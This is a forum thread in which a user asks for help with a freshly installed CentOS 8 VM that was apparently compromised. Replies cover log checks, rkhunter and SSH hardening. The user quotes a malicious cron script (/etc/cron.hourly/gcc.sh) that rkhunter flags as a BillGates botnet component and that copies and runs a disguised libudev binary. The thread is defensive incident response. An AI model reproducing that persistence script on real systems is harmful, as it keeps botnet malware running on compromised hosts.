Serious - Need help - CentOS8 - VM - Probably compromised
Ok, so finally it happened. A couple days ago, I installed centos8 on a VM... nothing else is configured. Its a brand new custom ISO install.
Today, I was checking the graphs/ stats and it looks like the server is maxing CPU for past 2 days and outbound network activity is happening at almost full port speed...
I am preplexed as to what may have happened. I have shut down the VM for now.. to make sure nothing more bad can happen (I think).
I know a quick fix is to reinstall... Since there is no data on the server as its a fresh install, I am OK to do that, but I would rather learn on troubleshooting this.
What is it something I can check to find out what was the reason for the outbound connectivity? Is my server compromised? If yes, what logs can I check? How can I know if some malicious user is wreaking havoc? What is it that was causing the 100% CPU (per providers chart)?
Any advise is appreciated.
Thanks in advance.
Comments
Reboot into a rescue cd and inspect your logs for indicators of compromise.
If I were a betting man $7 would say it's SSH bruteforce and whoever got in is launching DoS attacks. That would explain the traffic and the CPU.
Most likely compromised. I honestly would not even bother with logs since whether its compromised or not its not going to change the course of action which is just reinstalling.
Make sure you harden your SSH after the reinstall.
Would you be a bit specific on what logs may provide this info? Thnx
Hmm. That seems to be the best option. But I was just trying to see if there is any rogue script somewhere going crazy...
Interns of hardening, what are tour recommendations? Thanks
I'm not a CentOS person, but the equivalent of /var/log/auth.log should give you a clue on how/who logged in and from where (unless it's a more sophisticated attack which also wipes it's traces - which means it is going to be interesting to say the least). That should be your first goto place when you're inspecting the systems via rescue boot.
Disable password logins entirely and go full fledged key based. Firewall your SSH port (white list your IPs if that is feasible). To reduce the typical junk script from scanning, try to change your SSH port to something very unusual (this is to reduce noise in your logs and not really "secure" your SSH).
There are lots of other things - fail2ban for e.g. Pick your poison - there's enough well documented stuff on improving SSH security.
/var/log/secure
To be clear I absolutely recommend reinstalling, but I think there's value in finding how your system was compromised. That way you know where you need to improve security measures for next time.
Looks like it got botrekt.
Have a look at top or htop to see the running processes. It will update in real-time and show you what’s using 100% CPU.
It definitely sounds like a compromised system. Would always recommend securing SSH as a minimum after installing any OS.
Running RKhunter and the likes might help determine what it's infected with, I believe.
Netstat to show open connections.
Since you're running a VM, I'd suggest you to re-install first because if this is either DDoS or SPAM or something shady like that, you're probably going to get your VM kicked off from their servers due to abuse.
Re-install then follow a quality harden manual.
If you're coming in via console just don't enable the network. Investigate as long as you want.
We have 5 honeypot systems configured to evaluate default security configuration in various CentOS, Redhat, Debian, Ubuntu, Mint versions. The only systems that were compromised were due to the following:
1. SSH root password with less than 8 characters (no special characters)
2. CentOS 7 base install without running yum updates
3. Debian 6 base install vulnerabilities (with apt updates)
4. Ubuntu 16 server base install without apt updates
so based on our findings I assume that you either didn't run yum update after install or your SSH pass is less than 8 non-alphanumeric characters. What kind of customizations are done to your ISO?
For some reason, there is no such file for me.
Thanks. I just installed it.
[17:12:36] Warning: Checking for possible rootkit files and directories [ Warning ]
[17:12:36] Found file '/etc/cron.hourly/gcc.sh'. Possible rootkit: BillGates botnet component
[17:12:36]
the file in cron:
!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin
for i in
cat /proc/net/dev|grep :|awk -F: {'print $1'}
; do ifconfig $i up& donecp /lib/libudev.so /lib/libudev.so.6
/lib/libudev.so.6
Not sure what is wrong here.... any suggestions?
password is 8 char alpha numeric.
Yes, I probably did not run yum update.
Its a standard ISO provided by provider.. never had issue in general.
Not running the yum upgrade will leave your system vulnerable to several exploits depending on the version used. It is absolutely necessary to upgrade for security reasons.
It was Centos 8.2. So, I was a little lax here... I usually get to that, but, somehow I left it for the coming weekend to work on...
and this happened.
2 steps that I always do first:
1. Update = good check for connectivity, amongst other things.
2. Add authorized_keys and turn off shh password authentication.
Then it can idle until I setup CSF etc. but usually I just power down until ready to do further installs/configuration. In the time it takes to do those first two steps, I've seen failed login attempts easily exceed a thousand, with some server providers.
Here's similar case. https://stackoverflow.com/questions/36623596/is-this-file-gcc-sh-in-cron-hourly-malware
I'm pretty sure there's nothing usefull in /var/log. Propably there's nothing, because they try to hide how they got in.
You're saying that all three of these systems can be compromised remotely by means other than exploiting a week root password?
Not just once a week.
[Soz]
Thanks all. Whats a quick easy way to disable all outgoing connections from my VPS?
Sigh. Everyone please just turn off password auth unless you DO use a 18+char randomly generated password from a tool ( using FULL character set).
@vimalware how about fail2ban rather than complicated password???
Not effective.
No. Just no.
Take 5mins and teach your users about public key crypto.
private key : your eyes only.
public key : reqd on all systems you need to talk to.
while I agree that using keys instead of passwords should be the way to go, one should note that this table and given times are kind of meaningless without specification of the crunching setup.
most likely you will only achieve that, if you're already in possession of the hash so you can bruteforce directly on whatever powerful system.
the usual attacks against ssh still involve connection limits, latency and such, so it will for sure take a lot longer to brute force even an 8 mixed chars passwords directly. things like fail2ban add to that time frame simply because an attacker then needs to circle through tons of IPs or dial down on the frequency.
yes, fail2ban still usefull on random attack (little)
even on default config
i dont know on masive brute force attack
Yes you're right. I have posted the wrong image for this context.
This is for hashed password dumps.
Thank you all. Atleast for now I know what was the malware. But I haven't figured out anything from logs.
So many people suggest Key based authentication...
How does that work when I have multiple devices to login from? Like my phone/ home laptop/ work laptop/ an idling vps... what's best way to setup keys? Also if one pvt key on a device is compromised, wouldn't the attacker be able to remove other keys from server?
Thank you